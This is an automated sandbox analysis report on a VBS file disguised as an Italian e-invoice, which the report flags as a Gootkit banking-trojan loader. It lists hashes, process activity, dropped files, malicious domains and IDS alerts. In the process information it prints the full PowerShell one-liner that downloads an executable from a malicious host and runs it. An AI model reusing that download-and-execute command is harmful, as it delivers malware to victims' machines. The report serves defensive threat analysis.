File name: _Nuovi Fattura elettronica 2018__85.vbs

Full analysis: https://app.any.run/tasks/58ddf88f-e025-4ef3-ae12-b63ac7f60159
Verdict: Malicious activity
Threats:

Gootkit is an advanced banking trojan. It is extremely good at evading detection and has an incredibly effective persistence mechanism, making it a dangerous malware that researchers and organizations should be aware of.

Analysis date: December 14, 2018, 12:21:34
OS: Windows 7 Professional Service Pack 1 (build: 7601, 64 bit)
Tags:
trojan
loader
gootkit
Indicators:
MIME: text/plain
File info: ASCII text, with CRLF line terminators
MD5: B1964C6CF56F1529D255045DAF47BBF8
SHA1: 111D99AAEE4714CB13EB9B8208DE1E94481A0913
SHA256: 3EF1808D71F8D4CE398EF531FB16B3EACAF2FBFCCAF8E0D701209B1F94CA567C
SSDEEP: 3072:UzhhGSxg2BcZsKv5sDZjTbL4MEe9r7a9t598HMmrqIzOPDogrCqH18oi:UzhZxg2BcyKv+J3L4ME8r7a9T9ZmrqIz

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • tv_x64x32.exe (PID: 2892)
      • tv_x64x32.exe (PID: 552)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 2264)
    • Changes settings of System certificates

      • tv_x64x32.exe (PID: 552)
    • Detected GootKit

      • tv_x64x32.exe (PID: 2892)
    • Changes internet zones settings

      • tv_x64x32.exe (PID: 2892)
  • SUSPICIOUS

    • Reads Internet Cache Settings

      • powershell.exe (PID: 2264)
    • Creates files in the user directory

      • powershell.exe (PID: 2264)
      • tv_x64x32.exe (PID: 552)
    • Executes PowerShell scripts

      • WScript.exe (PID: 2276)
    • Reads the machine GUID from the registry

      • powershell.exe (PID: 2264)
      • WScript.exe (PID: 2276)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2264)
    • Application launched itself

      • tv_x64x32.exe (PID: 2892)
    • Reads CPU info

      • tv_x64x32.exe (PID: 552)
  • INFO

    No info indicators.
No Malware configuration.
No data.
All screenshots are available in the full report
Total processes: 37
Monitored processes: 4
Malicious processes: 3
Suspicious processes: 1

Behavior graph (interactive in the full report): start, drop and start: wscript.exe (no specs), powershell.exe, tv_x64x32.exe (#GOOTKIT), tv_x64x32.exe

Process information

PID: 2276
CMD: "C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\_Nuovi Fattura elettronica 2018__85.vbs"
Path: C:\Windows\System32\WScript.exe
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft ® Windows Based Script Host
Exit code: 0
Version: 5.8.7600.16385

PID: 2264
CMD: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ufiyzdvfg = New-Object -ComObject Msxml2.XMLHTTP; $awyheifv = New-Object -ComObject ADODB.Stream; $sduvbjvb = $env:temp + '\tv_x64x32.exe';$ufiyzdvfg.open('GET', 'http://amd.coiten.com//upll?92818', $false);$ufiyzdvfg.send(); if($ufiyzdvfg.Status -eq "200"){$awyheifv.open();$awyheifv.type = 1;$awyheifv.write($ufiyzdvfg.responseBody);$awyheifv.position = 0;$awyheifv.savetofile($sduvbjvb);$awyheifv.close();} Start-Process $sduvbjvb;
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: WScript.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Exit code: 0
Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID: 2892
CMD: "C:\Users\admin\AppData\Local\Temp\tv_x64x32.exe"
Path: C:\Users\admin\AppData\Local\Temp\tv_x64x32.exe
Parent process: powershell.exe
User: admin
Integrity Level: MEDIUM

PID: 552
CMD: C:\Users\admin\AppData\Local\Temp\tv_x64x32.exe --vwxyz
Path: C:\Users\admin\AppData\Local\Temp\tv_x64x32.exe
Parent process: tv_x64x32.exe
User: admin
Integrity Level: MEDIUM
Total events: 1 998
Read events: 736
Write events: 0
Delete events: 0

Modification events: No data

Executable files: 2
Suspicious files: 4
Text files: 4
Unknown types: 0

Dropped files

PID | Process | Filename | Type | MD5 | SHA256
2264 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ALY6L7CWLR7L1DQFGMOS.temp | | |
2264 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms | binary | 66C674FAF5938727AFF5D90EC5445F23 | 7025A80E97465DFE4B836333C348311D668663138FCD18401D84684FC95FF272
2892 | tv_x64x32.exe | C:\Users\admin\AppData\Local\Temp\tv_x64x32.inf | ini | 285F9CFD07DE99934A418B86B08F16EB | FFD8E3E5F1D075D4E34C877C8CA2EC12B7277231D08E4D02F476DCFCC1149B6A
552 | tv_x64x32.exe | C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3896776584-4254864009-862391680-1000\578c3c4f2234dc4bd77dc4898cd130e8_eeeb5d54-7880-42a7-b542-739bbc26cf4b | binary | 048DFB0DB1A17E5A42297F75919751EA | C5E610A2C0C9B6771ACAD79DF5226EB6622BC604EE051D5C0F68CEF442F1EC09
2264 | powershell.exe | C:\Users\admin\AppData\Local\Temp\tv_x64x32.exe | executable | A05CEB1E09CA311F7240963E262004AE | C97F69CE9AFA5737E5BB313FA621E75445B0D2758C4F9804B25118245A14EB42
2264 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BDW1XBVN\upll[1].txt | executable | A05CEB1E09CA311F7240963E262004AE | C97F69CE9AFA5737E5BB313FA621E75445B0D2758C4F9804B25118245A14EB42
2264 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFa788a.TMP | binary | 66C674FAF5938727AFF5D90EC5445F23 | 7025A80E97465DFE4B836333C348311D668663138FCD18401D84684FC95FF272
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 3
TCP/UDP connections: 23
DNS requests: 3
Threats: 0

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
552 | tv_x64x32.exe | GET | 200 | 109.230.199.169:443 | https://drk.fm604.com/rbody32 | SE | binary | 3.75 Mb | malicious
552 | tv_x64x32.exe | GET | 200 | 109.230.199.169:443 | https://drk.fm604.com/rbody320 | SE | text | 4 b | malicious
2264 | powershell.exe | GET | 200 | 31.214.157.31:80 | http://amd.coiten.com//upll?92818 | NL | executable | 233 Kb | malicious

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
552 | tv_x64x32.exe | 109.230.199.169:443 | drk.fm604.com | Portlane AB | SE | malicious
2264 | powershell.exe | 31.214.157.31:80 | amd.coiten.com | easystores GmbH | NL | malicious

DNS requests

Domain | IP | Reputation
amd.coiten.com | 31.214.157.31 | malicious
drk.fm604.com | 109.230.199.169 | malicious
it.sunballast.de | | unknown

Threats

PID | Process | Class | Message
2264 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP
2264 | powershell.exe | A Network Trojan was detected | ET TROJAN Possible Windows executable sent when remote host claims to send a Text File
552 | tv_x64x32.exe | Generic Protocol Command Decode | SURICATA STREAM excessive retransmissions
Process | Message
tv_x64x32.exe | MP3 file corrupted
tv_x64x32.exe | WMA 0
tv_x64x32.exe | WMA 3
tv_x64x32.exe | 552:C:\Users\admin\AppData\Local\Temp\tv_x64x32.exe --vwxyz Ignition....
tv_x64x32.exe | JS : RUN : tv_x64x32.exe, ver : 25.10.18.1117
tv_x64x32.exe | OGG 0